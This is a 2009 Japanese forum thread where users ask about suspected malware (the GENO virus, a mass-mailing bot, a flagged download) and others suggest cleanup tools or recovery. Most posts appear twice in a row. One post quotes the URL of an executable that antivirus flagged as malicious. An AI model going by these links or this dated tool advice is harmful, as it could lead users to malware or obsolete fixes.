特に変わったことはなかったのですが念のためにリカバリしました。
スッキリしたと思っていたのですが、ユーザー/appdata/local/Temp/ose00000.exe
なるものが気になっています。これだけ2006年10月の日付になっています。
vistaでofficeパーソナルを持っていると付いてくるものなのでしょうか?
ググってみましたが、日本語の情報がなくて一般サイトはしばらく踏む勇気がないので
調べられませんでした。
特に変わったことはなかったのですが念のためにリカバリしました。
スッキリしたと思っていたのですが、ユーザー/appdata/local/Temp/ose00000.exe
なるものが気になっています。これだけ2006年10月の日付になっています。
vistaでofficeパーソナルを持っていると付いてくるものなのでしょうか?
ググってみましたが、日本語の情報がなくて一般サイトはしばらく踏む勇気がないので
調べられませんでした。
769 :名無しさん@お腹いっぱい。:2009/04/08(水) 17:15:51
770 : ◆N9P3SuvBPo :2009/04/08(水) 17:21:23
>758
ログに感染と見られるものはないですが、一つだけ以下のエントリーをHijackThisでFIXして下さい。
>O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
(HJTには何も無しか…とはいえ大丈夫と判断下しても良いのだろうか…)
>768
リカバリした直後なら、問題なし。
ログに感染と見られるものはないですが、一つだけ以下のエントリーをHijackThisでFIXして下さい。
>O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
(HJTには何も無しか…とはいえ大丈夫と判断下しても良いのだろうか…)
>768
リカバリした直後なら、問題なし。
771 : ◆N9P3SuvBPo :2009/04/08(水) 17:42:11
ComboFixを奨めようかと考えていたんですが、この板のGENOウイルススレの11に
こんなカキコがあった。
>ただComboFixで自動処理するとアカウントにログイン出来なくなる
>(正規ファイルを悪玉ファイルに上書き→ComboFixが処理?)
アカウントにログイン出来なくなる
このことから、winlogon.exeあるいはuserinit.exeが改ざんされてると思われる。
再起動時のブルースクリーンのエラーメッセージさえ分かれば…
stop : c000021a Unknown Hard Error
とかならwinlogon.exeの修復を行なえば良いのだが。
あと、HJTもRSITでも見つからない
SDFixも駄目
レジストリエディタの起動も阻止
こんなカキコがあった。
>ただComboFixで自動処理するとアカウントにログイン出来なくなる
>(正規ファイルを悪玉ファイルに上書き→ComboFixが処理?)
アカウントにログイン出来なくなる
このことから、winlogon.exeあるいはuserinit.exeが改ざんされてると思われる。
再起動時のブルースクリーンのエラーメッセージさえ分かれば…
stop : c000021a Unknown Hard Error
とかならwinlogon.exeの修復を行なえば良いのだが。
あと、HJTもRSITでも見つからない
SDFixも駄目
レジストリエディタの起動も阻止
772 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:31:24
究極のセキュリティ対策
『 キャッシュをクリア(サッ 』
(やったー!カッコイイ!!!)
『 キャッシュをクリア(サッ 』
(やったー!カッコイイ!!!)
773 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:32:44
( ̄▽ ̄ ;)ハァ。。。。
>>771
>winlogon.exeあるいはuserinit.exe
それ疑って感染前のuserinit、winlogonのMD5取って
感染後と比較しても変わってなかった。
一回ComboFixで処置、再起動でログインできなくなって
回復コンソールでuserinit、kernel32.dll類を復元してみたけど
回復しなかったから別のところに問題があるのかも・・・(いまだにわからん)
>winlogon.exeあるいはuserinit.exe
それ疑って感染前のuserinit、winlogonのMD5取って
感染後と比較しても変わってなかった。
一回ComboFixで処置、再起動でログインできなくなって
回復コンソールでuserinit、kernel32.dll類を復元してみたけど
回復しなかったから別のところに問題があるのかも・・・(いまだにわからん)
775 : ◆N9P3SuvBPo :2009/04/08(水) 19:30:14
>774
そっち疑ってみたんすけど、違うみたいでしたか。
俺の環境では感染しないので分からないのだけど、ニュー速のほうで、
再起動時にブルスクになると書いてあったから、stopエラーかな?
と思ったんだがそれも違うんですよね?
そっち疑ってみたんすけど、違うみたいでしたか。
俺の環境では感染しないので分からないのだけど、ニュー速のほうで、
再起動時にブルスクになると書いてあったから、stopエラーかな?
と思ったんだがそれも違うんですよね?
ちなみに自分の環境じゃGENOウイルスでブルスクになったことはまだない
778 : ◆N9P3SuvBPo :2009/04/08(水) 20:01:33
>776
ブルスクはあくまでもニュー速スレの情報ですし
(ブルスクは環境に寄りけりと言ったところか…)
ログイン出来なくなった時はどんな状態になったんですか?
ブルスクはあくまでもニュー速スレの情報ですし
(ブルスクは環境に寄りけりと言ったところか…)
ログイン出来なくなった時はどんな状態になったんですか?
779 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:26:47
>>769>>770
どうもありがとうございます。office2007です。
virus totalにも行ってみたところ結果は0/40(0.00%)とありました。
ただの残骸のようなので普通に削除しようかと思います。
どうもありがとうございます。office2007です。
virus totalにも行ってみたところ結果は0/40(0.00%)とありました。
ただの残骸のようなので普通に削除しようかと思います。
780 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:02:08
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
781 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:09:18
ブルマスク水
>>778
壁紙だけ表示されて即ユーザー選択画面へ・・・
壁紙だけ表示されて即ユーザー選択画面へ・・・
783 : ◆N9P3SuvBPo :2009/04/09(木) 03:25:15
>>782
つまり…
起動→ようこそ画面→デスクトップの表示→ユーザー選択画面ってとこ?
強制的にログオフさせられているって感じのようですが…
それだったらログオンに関係するファイルがやられてる、としか…
でもログオン関係のファイルの修復しても復帰できなかったと言ってましたし、
原因は別だろうね。
ちなみに、俺一度こんな実験をやったことあります。
コンパネ→管理ツール→ローカルセキュリティポリシー
この中のどこかに「ローカル ログオン」というのがあって、
これを無効にして再起動したら、ログオンできなくなってしまい
リカバリーしました。
つまり…
起動→ようこそ画面→デスクトップの表示→ユーザー選択画面ってとこ?
強制的にログオフさせられているって感じのようですが…
それだったらログオンに関係するファイルがやられてる、としか…
でもログオン関係のファイルの修復しても復帰できなかったと言ってましたし、
原因は別だろうね。
ちなみに、俺一度こんな実験をやったことあります。
コンパネ→管理ツール→ローカルセキュリティポリシー
この中のどこかに「ローカル ログオン」というのがあって、
これを無効にして再起動したら、ログオンできなくなってしまい
リカバリーしました。
784 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:03:12
785 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:12:59
ボットに感染してるかどうか
サイバークリーンってとこの駆除ツールを実行してみた方がいいんですかね?
OCNからの定期メールで やってみな みたいなこと書いてあったんですが・・・
サイバークリーンってとこの駆除ツールを実行してみた方がいいんですかね?
OCNからの定期メールで やってみな みたいなこと書いてあったんですが・・・
786 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:53:37
そこはバスター、ゾンビがいるぞw
787 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:24:32
788 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:41:57
789 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:49:24
790 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:27:30
GENOウイルスやべえな
791 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:29:43
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★11
http://tsushima.2ch.net/test/read.cgi/news/1239241638/
http://tsushima.2ch.net/test/read.cgi/news/1239241638/
792 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:10:41
【使用OS】 「XPProSP3」
【Microsoft Update(MU)の状態】 「つながりません」
【使用セキュリティソフトとバージョン】 「Norton Internet Security 2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Ad-Aware SE」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」
どうやらウィルスに感染してしまったようでPCを立ち上げたとき、または一定時間ごとに、
メールを大量に送付してしまいます。
ウィルススキャンをして感染ファイルを削除したため今は収まっていますが、
当初はservices.exeが終了して再起動してしまいました。
今はウィルスは検出されていませんがレジストリが改変されてしまったようで、
メールを大量に送付し続けています。(メールはプロバイダがブロックして送信されていないようです。)
対策をご存知の方がいらっしゃいましたら宜しくお願いします。
【Microsoft Update(MU)の状態】 「つながりません」
【使用セキュリティソフトとバージョン】 「Norton Internet Security 2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Ad-Aware SE」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」
どうやらウィルスに感染してしまったようでPCを立ち上げたとき、または一定時間ごとに、
メールを大量に送付してしまいます。
ウィルススキャンをして感染ファイルを削除したため今は収まっていますが、
当初はservices.exeが終了して再起動してしまいました。
今はウィルスは検出されていませんがレジストリが改変されてしまったようで、
メールを大量に送付し続けています。(メールはプロバイダがブロックして送信されていないようです。)
対策をご存知の方がいらっしゃいましたら宜しくお願いします。
793 :八頭 ◆YAGApwSaEw :2009/04/09(木) 16:45:07
>>792
DDS
ttp://www.forospyware.com/sUBs/dds
dds.scr(MS-DOS アプリケーション)をデスクトップにダウンロード
DDSを実行・・・
DDSによるログ抽出が済むまで操作はありません ttp://i39.tinypic.com/slqvly.jpg
ログ抽出走査が完了すると「DDS - How to post the logs(投稿時の注意点)」のダイアログ表示はOKで閉じます
自動的にDDS.txt とAttach.txt の2つがメモ帳で開くので、
ファイル(F)→「名前を付けて保存(A)」でそれぞれのログを保存しておく。(*テキスト名は変更しない)
OTViewIt
ttp://oldtimer.geekstogo.com/OTViewIt.exe
OTViewIt.exeをデスクトップへダウンロード
OTViewItを実行
「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTViewIt.txt」と「Extra.txt」がメモ帳で表示されて、デスクトップ上にテキストが自動的に保存されています
これらのログテキストを新規フォルダへコピー&貼り付けしてから→フォルダを圧縮
Upload a suspected infected fileへ、[ Report ] - Infection log report (Massmail bot infection. ) として送信
http://pc11.2ch.net/test/read.cgi/sec/1239086455/9 の中段
DDS
ttp://www.forospyware.com/sUBs/dds
dds.scr(MS-DOS アプリケーション)をデスクトップにダウンロード
DDSを実行・・・
DDSによるログ抽出が済むまで操作はありません ttp://i39.tinypic.com/slqvly.jpg
ログ抽出走査が完了すると「DDS - How to post the logs(投稿時の注意点)」のダイアログ表示はOKで閉じます
自動的にDDS.txt とAttach.txt の2つがメモ帳で開くので、
ファイル(F)→「名前を付けて保存(A)」でそれぞれのログを保存しておく。(*テキスト名は変更しない)
OTViewIt
ttp://oldtimer.geekstogo.com/OTViewIt.exe
OTViewIt.exeをデスクトップへダウンロード
OTViewItを実行
「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTViewIt.txt」と「Extra.txt」がメモ帳で表示されて、デスクトップ上にテキストが自動的に保存されています
これらのログテキストを新規フォルダへコピー&貼り付けしてから→フォルダを圧縮
Upload a suspected infected fileへ、[ Report ] - Infection log report (Massmail bot infection. ) として送信
http://pc11.2ch.net/test/read.cgi/sec/1239086455/9 の中段
794 : ◆N9P3SuvBPo :2009/04/09(木) 17:05:32
>792
リカバリしてください。
そっちのほうが手間掛からずに済みます。
リカバリしてください。
そっちのほうが手間掛からずに済みます。
795 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:36:11
ファイルに感染するたびにウイルス自体をランダムな
暗号化コードで暗号化するポリモーフィック型の不正プログラム
「PE_VIRUX(バイラックス)」の流通が確認されたと報告。
「PE_VIRUX」は、正規ファイル(exeファイルやscrファイル)に
感染する際に、自身のコードを追加する場所や暗号化の方式・回数を
ランダムに変更するため駆除が困難
ポリモーフィック型って複号化するロジック部分を検出すれば見つかるって
聞いたけど無理なの?
メタモーフィック型なら無理な気がするけど
暗号化コードで暗号化するポリモーフィック型の不正プログラム
「PE_VIRUX(バイラックス)」の流通が確認されたと報告。
「PE_VIRUX」は、正規ファイル(exeファイルやscrファイル)に
感染する際に、自身のコードを追加する場所や暗号化の方式・回数を
ランダムに変更するため駆除が困難
ポリモーフィック型って複号化するロジック部分を検出すれば見つかるって
聞いたけど無理なの?
メタモーフィック型なら無理な気がするけど
796 :八頭 ◆YAGApwSaEw :2009/04/09(木) 18:52:52
>>792
[ Report ]の提出が完了したら、オートラン設定を確認する
@・IPA 情報処理推進機構
●「外部記憶メディアのセキュリティ対策を再確認しよう!」 USB メモリの利用における対策
ttp://www.ipa.go.jp/security/txt/2008/12outline.html
A・使用しているソフトウェアやWebプラグイン類の最新版Updateとセキュリティ設定を常に心掛けましょう
(*解凍ソフト、動画Player、Adobe Reader用パッチ、Mailソフト、Officeソフト、Sun MicrosystemsのJavaなど)
B「Ad-Aware SE」 は保護機能を解除してから、「プログラムの追加と削除」からアンインストールして、
次の3つとも装備すること
http://pc11.2ch.net/test/read.cgi/sec/1239086455/8
・「a-squared Free 4.0」
・「Malwarebytes' Anti-Malware 1.35」
・「Avira AntiVir Personal - FREE Antivirus, Version 8
[ Report ]の提出が完了したら、オートラン設定を確認する
@・IPA 情報処理推進機構
●「外部記憶メディアのセキュリティ対策を再確認しよう!」 USB メモリの利用における対策
ttp://www.ipa.go.jp/security/txt/2008/12outline.html
A・使用しているソフトウェアやWebプラグイン類の最新版Updateとセキュリティ設定を常に心掛けましょう
(*解凍ソフト、動画Player、Adobe Reader用パッチ、Mailソフト、Officeソフト、Sun MicrosystemsのJavaなど)
B「Ad-Aware SE」 は保護機能を解除してから、「プログラムの追加と削除」からアンインストールして、
次の3つとも装備すること
http://pc11.2ch.net/test/read.cgi/sec/1239086455/8
・「a-squared Free 4.0」
・「Malwarebytes' Anti-Malware 1.35」
・「Avira AntiVir Personal - FREE Antivirus, Version 8
797 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:19:04
>>792
ウイルス名もわからない様ではどうにも…
そんな状態のPCはネットにつないではいけない。
漏れも駆除するよりリカバリに一票。
それから、Ad-Aware SEは3月31日で定義ファイルの提供が終了してます。
Lavasoftソフトを使うならAd-Aware AE(デフォルトで日本語有り)に。
ウイルス名もわからない様ではどうにも…
そんな状態のPCはネットにつないではいけない。
漏れも駆除するよりリカバリに一票。
それから、Ad-Aware SEは3月31日で定義ファイルの提供が終了してます。
Lavasoftソフトを使うならAd-Aware AE(デフォルトで日本語有り)に。
798 :名無しさん@お腹いっぱい。:2009/04/12(日) 03:06:19
Kido.ih
に感染しました
msと主なセキュリティサイトに繋がりません
に感染しました
msと主なセキュリティサイトに繋がりません
799 :名無しさん@お腹いっぱい。:2009/04/12(日) 03:11:00
800 :名無しさん@お腹いっぱい。:2009/04/12(日) 04:01:23
>>792
リカバリしたくないのであればさらにspybot,clamなどを推奨。非常駐で使えるものは全て使ってみて下さい。
全て試して全く引っかからないか、引っかかってもあまりにも多ければリカバリしましょう。
駆除できてもパソコンの性能はガクンと落ちてしまいます。
リカバリしたくないのであればさらにspybot,clamなどを推奨。非常駐で使えるものは全て使ってみて下さい。
全て試して全く引っかからないか、引っかかってもあまりにも多ければリカバリしましょう。
駆除できてもパソコンの性能はガクンと落ちてしまいます。
801 :名無しさん@お腹いっぱい。:2009/04/12(日) 04:16:32
いまどきAd-AwareとかSpybotとかClamなんて
アメリカ人でも使ってないからw
アメリカ人でも使ってないからw
802 :名無しさん@お腹いっぱい。:2009/04/12(日) 05:50:47
803 :名無しさん@お腹いっぱい。:2009/04/13(月) 00:50:50
手動削除中なのだが
l.cmd
コレってウィルス? 純粋なシステムファイル?
ググッてもヤフーでググってもいまいちピンとこないんで…
l.cmd
コレってウィルス? 純粋なシステムファイル?
ググッてもヤフーでググってもいまいちピンとこないんで…
804 :名無しさん@お腹いっぱい。:2009/04/13(月) 08:22:12
ランダムなファイル名の奴がごろごろしているのに
ファイル名だけでわかるかボケ
バッチだからメモ帳あたりで開いて読んで判断しろ
ファイル名だけでわかるかボケ
バッチだからメモ帳あたりで開いて読んで判断しろ
805 :名無しさん@お腹いっぱい。:2009/04/14(火) 01:44:02
こっちで質問するようすすめられた。
マルチじゃないのでよろしく
勘違いかもしれないけど国民新党のホームページ乗っ取られたの?
さっきあちこちの政党のホームページ見てたんだけど国民新党のホームページ開いたらfirefoxが強制終了した。
不思議に思ってもう一回開いたらやっぱり強制終了。
不安になったのでパソコンのウィルスチェック、問題なし・・
aguse gatewayでhttp://www.kokumin.or.jp/opinion/を調査、問題なし・・
一体何故なのか分からない。ちなみに他のページ見たりするのには何の問題もない
不審なソフトの動きもない
勘違いかもしれないけどもしそういう情報があったら教えて。長レスしてスマソ
マルチじゃないのでよろしく
勘違いかもしれないけど国民新党のホームページ乗っ取られたの?
さっきあちこちの政党のホームページ見てたんだけど国民新党のホームページ開いたらfirefoxが強制終了した。
不思議に思ってもう一回開いたらやっぱり強制終了。
不安になったのでパソコンのウィルスチェック、問題なし・・
aguse gatewayでhttp://www.kokumin.or.jp/opinion/を調査、問題なし・・
一体何故なのか分からない。ちなみに他のページ見たりするのには何の問題もない
不審なソフトの動きもない
勘違いかもしれないけどもしそういう情報があったら教えて。長レスしてスマソ
806 :名無しさん@お腹いっぱい。:2009/04/14(火) 03:10:41
質問です
あるサイトでファイルをダウンロードしていたら、いきなりポップアップ画面で
「あなたも○○(自宅の住所。ローマ字で)に住んでるんでしょ?」
とか出てきました。
なぜ住所がばれたのでしょうか? ウイルスですか?
ダウンロードしたファイルをウイルス検索しても、何も引っかかりませんでした
よかったらご教示ください
あるサイトでファイルをダウンロードしていたら、いきなりポップアップ画面で
「あなたも○○(自宅の住所。ローマ字で)に住んでるんでしょ?」
とか出てきました。
なぜ住所がばれたのでしょうか? ウイルスですか?
ダウンロードしたファイルをウイルス検索しても、何も引っかかりませんでした
よかったらご教示ください
807 :名無しさん@お腹いっぱい。:2009/04/14(火) 05:49:09
>>806
IPからどこら辺に住んでるかとかは分かるよ?でも東京とか大阪とか大雑把にしか分からんでしょ?
アクセス情報【使用中のIPアドレス確認】
ttp://www.cman.jp/network/support/go_access.cgi
あとどのサイトか言ってくれなきゃ答えるにも難しい。
住所ってどのくらい正確に出てきたの?
IPからどこら辺に住んでるかとかは分かるよ?でも東京とか大阪とか大雑把にしか分からんでしょ?
アクセス情報【使用中のIPアドレス確認】
ttp://www.cman.jp/network/support/go_access.cgi
あとどのサイトか言ってくれなきゃ答えるにも難しい。
住所ってどのくらい正確に出てきたの?
808 :名無しさん@お腹いっぱい。:2009/04/14(火) 08:16:15
ただのメッセンジャスパムだったりしてな
809 :名無しさん@お腹いっぱい。:2009/04/14(火) 12:51:58
>>807
説明が足りなくてすいません
「同人こっとん」という同人誌のサイトです
「〜市」まで(出てきたのは市のみです)特定されていました
ごく最近パソコンをリカバリして、ウイルスとかにはやられてないと思うのですが……
説明が足りなくてすいません
「同人こっとん」という同人誌のサイトです
「〜市」まで(出てきたのは市のみです)特定されていました
ごく最近パソコンをリカバリして、ウイルスとかにはやられてないと思うのですが……
810 :名無しさん@お腹いっぱい。:2009/04/14(火) 13:17:35
>>809
使ってるブラウザは何?あとポップアップは表示しないように設定してる?
aguse gatewayでググってそこにそのサイトのURLぶちこんで調査、そこで問題なければ大丈夫なはず。
あとそんなに気にするほどでもないと思う。807で述べた通り基本的にIPはどこら辺に住んでるかの情報を含む。
住んでいる番地まで出たのなら話は別だが市町村程度までならそんなもん。
心配ならPG2でも導入すべし。
便利なIPフィルタソフト、PeerGuardian2
http://ex24.2ch.net/test/read.cgi/pc2nanmin/1239572745/
どうしても心配ならもう一回わざと表示させて、その画面をプリントスクリーンでコピー、画像に貼ってどっかにアップしてみて。
それが一番確実。レスだけでは憶測でしか判断できん。
使ってるブラウザは何?あとポップアップは表示しないように設定してる?
aguse gatewayでググってそこにそのサイトのURLぶちこんで調査、そこで問題なければ大丈夫なはず。
あとそんなに気にするほどでもないと思う。807で述べた通り基本的にIPはどこら辺に住んでるかの情報を含む。
住んでいる番地まで出たのなら話は別だが市町村程度までならそんなもん。
心配ならPG2でも導入すべし。
便利なIPフィルタソフト、PeerGuardian2
http://ex24.2ch.net/test/read.cgi/pc2nanmin/1239572745/
どうしても心配ならもう一回わざと表示させて、その画面をプリントスクリーンでコピー、画像に貼ってどっかにアップしてみて。
それが一番確実。レスだけでは憶測でしか判断できん。
811 :名無しさん@お腹いっぱい。:2009/04/14(火) 16:09:37
>>810
ありがとうございます
当のサイトをaguse Gatewayで見ようとしたのですが、
「画像を取得できませんでした」
というのがどのサイトを入力しても出ます
そのメッセージでぐぐってもヒットしないので、よかったら本来はどう表示されるのかを教えてもらえないでしょうか
まず、「ウェブ」で調べたところ、メインページを含めて色は変わりませんでしたが、
「ゲートウェイ」で例のポップアップ画面が出るページを張ったら色が紫になりました
こういう場合、そのサイトにいるだけでも危険ですか?
無知で申し訳ありませんが、もう少しお付き合いいただけるとうれしいです
ありがとうございます
当のサイトをaguse Gatewayで見ようとしたのですが、
「画像を取得できませんでした」
というのがどのサイトを入力しても出ます
そのメッセージでぐぐってもヒットしないので、よかったら本来はどう表示されるのかを教えてもらえないでしょうか
まず、「ウェブ」で調べたところ、メインページを含めて色は変わりませんでしたが、
「ゲートウェイ」で例のポップアップ画面が出るページを張ったら色が紫になりました
こういう場合、そのサイトにいるだけでも危険ですか?
無知で申し訳ありませんが、もう少しお付き合いいただけるとうれしいです
812 :名無しさん@お腹いっぱい。:2009/04/14(火) 16:38:12
>>811
安全なら緑、危険なら紫になる
一応あんたの言うページ調べたけど特に問題はないはず。入る前に幾つかのソフトで何重にもかけて調べたが問題なし
ページ情報にも悪意のあるもんは見当たらなかった。
ただ気になるのはそのポップアップ画面には一度も出くわさなかった。
firefoxでポップアップウィンドウブロックをしてるからだろうが自分から外すわけにはいかん。
手間をかけるがそのポップアップ画面が出るページのURL貼ってくれ
(みんなに迷惑かけないようポップアップ画面が出るページのURLと明示して貼ってくれ)
あといるだけで危険かと言うと、その発想には指摘すべきことがある。
そもそも今も昔もセキュリティソフトとかはパソコンに侵入されたら意外と脆いものなのだよ。
もちろん最近では少しなら侵入されても対応できるようになってるが、それ以前に侵入させないことが一番重要なわけ。
だから危険なページにいるいないじゃなくて入る前に危険かどうか判断できることが大事になるわけよ
仮に開いてしまってもページ情報を読み込ませず遮断するよう設定しておくことは必須。usercash系なんかがいい例
さっき教えたaguse gateway、これ使えばかならの割合で危険サイト回避できるし、最近のアンチウィルスソフトなら
グーグル検索の段階で危険かどうかレベル分けして表示されるはず。そういうのを利用して最初から入らないのが正しい使い方になる
aguse gatewayを教えたのもそういう対策があるよってこと
つまり危険サイトに一度はいったらすぐ出ようとずっと居座ろうとあんまり変わらん。もちろん一刻も早く出るにこしたことはないが
本当に悪意のあるサイトだったら入った時点でアウト。
ただあんんたのいうサイトはそのポップアップ画面が出るページのURL?踏まなきゃ平気だと思う。
さっきも言ったがとりあえずそのポップアップ画面が出るページのURL貼ってみて
安全なら緑、危険なら紫になる
一応あんたの言うページ調べたけど特に問題はないはず。入る前に幾つかのソフトで何重にもかけて調べたが問題なし
ページ情報にも悪意のあるもんは見当たらなかった。
ただ気になるのはそのポップアップ画面には一度も出くわさなかった。
firefoxでポップアップウィンドウブロックをしてるからだろうが自分から外すわけにはいかん。
手間をかけるがそのポップアップ画面が出るページのURL貼ってくれ
(みんなに迷惑かけないようポップアップ画面が出るページのURLと明示して貼ってくれ)
あといるだけで危険かと言うと、その発想には指摘すべきことがある。
そもそも今も昔もセキュリティソフトとかはパソコンに侵入されたら意外と脆いものなのだよ。
もちろん最近では少しなら侵入されても対応できるようになってるが、それ以前に侵入させないことが一番重要なわけ。
だから危険なページにいるいないじゃなくて入る前に危険かどうか判断できることが大事になるわけよ
仮に開いてしまってもページ情報を読み込ませず遮断するよう設定しておくことは必須。usercash系なんかがいい例
さっき教えたaguse gateway、これ使えばかならの割合で危険サイト回避できるし、最近のアンチウィルスソフトなら
グーグル検索の段階で危険かどうかレベル分けして表示されるはず。そういうのを利用して最初から入らないのが正しい使い方になる
aguse gatewayを教えたのもそういう対策があるよってこと
つまり危険サイトに一度はいったらすぐ出ようとずっと居座ろうとあんまり変わらん。もちろん一刻も早く出るにこしたことはないが
本当に悪意のあるサイトだったら入った時点でアウト。
ただあんんたのいうサイトはそのポップアップ画面が出るページのURL?踏まなきゃ平気だと思う。
さっきも言ったがとりあえずそのポップアップ画面が出るページのURL貼ってみて
813 :名無しさん@お腹いっぱい。:2009/04/14(火) 16:54:15
いろいろとありがとうございます 助かります
ポップアップが出るURLです
ttp://errors.servik.com/denied.htm
数秒待つと、下のほうに出てきます
ご迷惑をおかけしますが、よろしくお願いします
ポップアップが出るURLです
ttp://errors.servik.com/denied.htm
数秒待つと、下のほうに出てきます
ご迷惑をおかけしますが、よろしくお願いします
814 :名無しさん@お腹いっぱい。:2009/04/14(火) 20:19:19
>>813アドレスでぐぐったらでてきた参考になるかは?
勇気が無くて見れない画像解説スレin半角Part526
284 :/名無しさん[1-30].jpg:2007/09/24(月) 20:54:50 ID:sPWYzFuB0
errors.servik.com/denied.htm
おねがい
288 :/名無しさん[1-30].jpg:2007/09/24(月) 21:42:19 ID:SQVwd+m+0
>>284
つまりはアダルトサイトの様です
その先は自己責任で
307 :(コテハン):2007/09/24(月) 23:32:52 ID:CJiqs2MF0
>>284
Error - Site cannot be accessed などと表示されリンクがあり
リンク先は McAfee SiteAdvisor で微妙な判定の海外の出会い系サイトに逝きます
漏れの環境ではそこまではPC無害ですが一応注意
勇気が無くて見れない画像解説スレin半角Part526
284 :/名無しさん[1-30].jpg:2007/09/24(月) 20:54:50 ID:sPWYzFuB0
errors.servik.com/denied.htm
おねがい
288 :/名無しさん[1-30].jpg:2007/09/24(月) 21:42:19 ID:SQVwd+m+0
>>284
つまりはアダルトサイトの様です
その先は自己責任で
307 :(コテハン):2007/09/24(月) 23:32:52 ID:CJiqs2MF0
>>284
Error - Site cannot be accessed などと表示されリンクがあり
リンク先は McAfee SiteAdvisor で微妙な判定の海外の出会い系サイトに逝きます
漏れの環境ではそこまではPC無害ですが一応注意
815 :名無しさん@お腹いっぱい。:2009/04/14(火) 23:43:33
816 :名無しさん@お腹いっぱい。:2009/04/15(水) 02:23:16
質問です。
公務員志望で,公務員予備校の資料を複数の学校からweb上で取り寄せたのですが
請求したところの資料が到着してから数日後に,資料請求してない予備校からも学校案内が届きました。
これはウィルスなどの影響でしょうか。それとも個人情報漏えいされているのでしょうか。
いずれにせよ詳しくその仕組みを教えていただければ幸いです。
公務員志望で,公務員予備校の資料を複数の学校からweb上で取り寄せたのですが
請求したところの資料が到着してから数日後に,資料請求してない予備校からも学校案内が届きました。
これはウィルスなどの影響でしょうか。それとも個人情報漏えいされているのでしょうか。
いずれにせよ詳しくその仕組みを教えていただければ幸いです。
817 :名無しさん@お腹いっぱい。:2009/04/15(水) 04:50:10
うぉお・・・
ウィルスのせいでVistaから
「お前のコンピューター、正規品じゃねーぞカス」
「もうぜってー起動してやんねーw」
とか警告が・・・orz
ウィルスのせいでVistaから
「お前のコンピューター、正規品じゃねーぞカス」
「もうぜってー起動してやんねーw」
とか警告が・・・orz
818 :名無しさん@お腹いっぱい。:2009/04/15(水) 05:07:23
>>816
今のご時世お互いに潰しあってる場合じゃない。予備校とて同じ。一つの予備校に資料請求すれば他の予備校にも情報が伝わる。
資料請求する場合はそういうことよくある。個人情報は漏洩しませんって言っても結局は業界団体にデータとして伝わるし
どうしても気になるなら資料請求したところに電話してみな。どうにかなるわけではないが一応迷惑だって意思を伝えるのは大事なこと
今のご時世お互いに潰しあってる場合じゃない。予備校とて同じ。一つの予備校に資料請求すれば他の予備校にも情報が伝わる。
資料請求する場合はそういうことよくある。個人情報は漏洩しませんって言っても結局は業界団体にデータとして伝わるし
どうしても気になるなら資料請求したところに電話してみな。どうにかなるわけではないが一応迷惑だって意思を伝えるのは大事なこと
819 :名無しさん@お腹いっぱい。:2009/04/15(水) 05:29:07
820 :名無しさん@お腹いっぱい。:2009/04/15(水) 05:45:33
821 :名無しさん@お腹いっぱい。:2009/04/17(金) 15:55:33
【使用OS】 XP SP3
【PCスペック】 HP compaq nx9030 メモリ1.2G
【セキュリティソフトと年式】 ウィルスバスター2009
ウィルスバスター2009の履歴を見たところPAC_Generic 001が発見され削除されていました。
webメール検索が発見され自動で削除されていました。
発見されたところを見ると
ttp://bosamedia.org/getfile/Chaos.Queen.Ryoko.Scenario.4.exeとなっていました。
実に覚えが無いので恐らくインターネットを見てる時、どこか間違えてはいったのかもしれません。
このPAC_Generic 001をgoogleで検索したところ情報が4件しかなく情報がありませんでした。
このPAC_Generic 001とはどのようなものなのでしょうか?
お分かりの方、教えて下さい。
【PCスペック】 HP compaq nx9030 メモリ1.2G
【セキュリティソフトと年式】 ウィルスバスター2009
ウィルスバスター2009の履歴を見たところPAC_Generic 001が発見され削除されていました。
webメール検索が発見され自動で削除されていました。
発見されたところを見ると
ttp://bosamedia.org/getfile/Chaos.Queen.Ryoko.Scenario.4.exeとなっていました。
実に覚えが無いので恐らくインターネットを見てる時、どこか間違えてはいったのかもしれません。
このPAC_Generic 001をgoogleで検索したところ情報が4件しかなく情報がありませんでした。
このPAC_Generic 001とはどのようなものなのでしょうか?
お分かりの方、教えて下さい。
822 :名無しさん@お腹いっぱい。:2009/04/17(金) 15:58:55
>>821
PAC_Generic 001?何だそりゃ?
こっちで聞いたら?
↓↓↓
